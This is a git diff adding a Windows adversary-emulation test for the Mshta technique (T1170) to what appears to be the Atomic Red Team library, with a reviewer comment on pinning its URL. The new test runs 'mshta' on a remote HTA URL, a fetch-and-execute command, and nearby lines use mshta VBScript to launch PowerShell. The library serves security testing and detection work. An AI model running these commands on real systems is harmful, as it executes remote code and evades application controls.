diff --git a/atomics/T1170/T1170.hta b/atomics/T1170/T1170.hta
new file mode 100644
index 00000000..59101b61
--- /dev/null
+++ b/atomics/T1170/T1170.hta
@@ -0,0 +1,12 @@
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/atomics/T1170/T1170.md b/atomics/T1170/T1170.md
index b90a6ac2..07e032d7 100644
--- a/atomics/T1170/T1170.md
+++ b/atomics/T1170/T1170.md
@@ -18,6 +18,8 @@ Mshta.exe can be used to bypass application whitelisting solutions that do not a
- [Atomic Test #3 - Mshta executes VBScript to execute malicious command](#atomic-test-3---mshta-executes-vbscript-to-execute-malicious-command)
+- [Atomic Test #4 - Mshta Executes Remote HTML Application (HTA)](#atomic-test-4---mshta-executes-remote-html-application-hta)
+
@@ -82,4 +84,25 @@ mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""powershell -noexit
+
+
+
+## Atomic Test #4 - Mshta Executes Remote HTML Application (HTA)
+Execute an arbitrary remote HTA.
+
+**Supported Platforms:** Windows
+
+
+#### Inputs
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| hta_url | URL to HTA file for execution | string | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1170/T1170.hta|
+
+#### Run it with `command_prompt`!
+```
+mshta #{hta_url}
+```
+
+
+
diff --git a/atomics/T1170/T1170.yaml b/atomics/T1170/T1170.yaml
index 81ad4b11..5c77f4cd 100644
--- a/atomics/T1170/T1170.yaml
+++ b/atomics/T1170/T1170.yaml
@@ -51,4 +51,20 @@ atomic_tests:
executor:
name: command_prompt
command: |
- mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""powershell -noexit -file #{atomics_path}\T1170\src\powershell.ps1"":close")
\ No newline at end of file
+ mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""powershell -noexit -file #{atomics_path}\T1170\src\powershell.ps1"":close")
+
+- name: Mshta Executes Remote HTML Application (HTA)
+ description: |
+ Execute an arbitrary remote HTA.
+
+ supported_platforms:
+ - windows
+ input_arguments:
+ hta_url:
+ description: URL to HTA file for execution
+ type: string
+ default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1170/T1170.hta
+ executor:
+ name: command_prompt
+ command: |
+ mshta #{hta_url}
\ No newline at end of file
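Review bot: The default for `hta_url` tracks the mutable `master` ref on raw.githubusercontent.com, so the content that `mshta #{hta_url}` fetches and runs on the test host can change without this definition changing. Once the HTA has landed, pinning the default to a commit, e.g. `default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/<commit-sha>/atomics/T1170/T1170.hta` (placeholder SHA), would keep each run reviewable and reproducible. The argument is also substituted unquoted into a `command_prompt` line; `mshta "#{hta_url}"` would keep a URL containing `&` from being split by cmd. The description `Execute an arbitrary remote HTA.` could also state what the bundled HTA does when run, so the operator knows what telemetry to expect and what to clean up afterwards; the generated T1170.md and index.yaml entries repeat the same default and would follow on regeneration.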
diff --git a/atomics/index.md b/atomics/index.md
index 0d20e9d0..52300ebb 100644
--- a/atomics/index.md
+++ b/atomics/index.md
@@ -300,6 +300,7 @@
- Atomic Test #1: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject [windows]
- Atomic Test #2: Mshta calls a local VBScript file to launch notepad.exe [windows]
- Atomic Test #3: Mshta executes VBScript to execute malicious command [windows]
+ - Atomic Test #4: Mshta Executes Remote HTML Application (HTA) [windows]
- [T1096 NTFS File Attributes](./T1096/T1096.md)
- Atomic Test #1: Alternate Data Streams (ADS) [windows]
- [T1126 Network Share Connection Removal](./T1126/T1126.md)
@@ -682,6 +683,7 @@
- Atomic Test #1: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject [windows]
- Atomic Test #2: Mshta calls a local VBScript file to launch notepad.exe [windows]
- Atomic Test #3: Mshta executes VBScript to execute malicious command [windows]
+ - Atomic Test #4: Mshta Executes Remote HTML Application (HTA) [windows]
- [T1086 PowerShell](./T1086/T1086.md)
- Atomic Test #1: Mimikatz [windows]
- Atomic Test #2: BloodHound [windows]
diff --git a/atomics/index.yaml b/atomics/index.yaml
index 4e1bd378..02954daf 100644
--- a/atomics/index.yaml
+++ b/atomics/index.yaml
@@ -8913,7 +8913,23 @@ defense-evasion:
executor:
name: command_prompt
command: 'mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""powershell
- -noexit -file #{atomics_path}\T1170\src\powershell.ps1"":close")'
+ -noexit -file #{atomics_path}\T1170\src\powershell.ps1"":close")
+
+'
+ - name: Mshta Executes Remote HTML Application (HTA)
+ description: 'Execute an arbitrary remote HTA.
+
+'
+ supported_platforms:
+ - windows
+ input_arguments:
+ hta_url:
+ description: URL to HTA file for execution
+ type: string
+ default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1170/T1170.hta
+ executor:
+ name: command_prompt
+ command: 'mshta #{hta_url}'
T1096:
technique:
x_mitre_data_sources:
@@ -19406,7 +19422,23 @@ execution:
executor:
name: command_prompt
command: 'mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""powershell
- -noexit -file #{atomics_path}\T1170\src\powershell.ps1"":close")'
+ -noexit -file #{atomics_path}\T1170\src\powershell.ps1"":close")
+
+'
+ - name: Mshta Executes Remote HTML Application (HTA)
+ description: 'Execute an arbitrary remote HTA.
+
+'
+ supported_platforms:
+ - windows
+ input_arguments:
+ hta_url:
+ description: URL to HTA file for execution
+ type: string
+ default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1170/T1170.hta
+ executor:
+ name: command_prompt
+ command: 'mshta #{hta_url}'
T1086:
technique:
x_mitre_permissions_required:
diff --git a/atomics/windows-index.md b/atomics/windows-index.md
index 3a35379e..1f5dcc1a 100644
--- a/atomics/windows-index.md
+++ b/atomics/windows-index.md
@@ -100,6 +100,7 @@
- Atomic Test #1: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject [windows]
- Atomic Test #2: Mshta calls a local VBScript file to launch notepad.exe [windows]
- Atomic Test #3: Mshta executes VBScript to execute malicious command [windows]
+ - Atomic Test #4: Mshta Executes Remote HTML Application (HTA) [windows]
- [T1096 NTFS File Attributes](./T1096/T1096.md)
- Atomic Test #1: Alternate Data Streams (ADS) [windows]
- [T1126 Network Share Connection Removal](./T1126/T1126.md)
@@ -544,6 +545,7 @@
- Atomic Test #1: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject [windows]
- Atomic Test #2: Mshta calls a local VBScript file to launch notepad.exe [windows]
- Atomic Test #3: Mshta executes VBScript to execute malicious command [windows]
+ - Atomic Test #4: Mshta Executes Remote HTML Application (HTA) [windows]
- [T1086 PowerShell](./T1086/T1086.md)
- Atomic Test #1: Mimikatz [windows]
- Atomic Test #2: BloodHound [windows]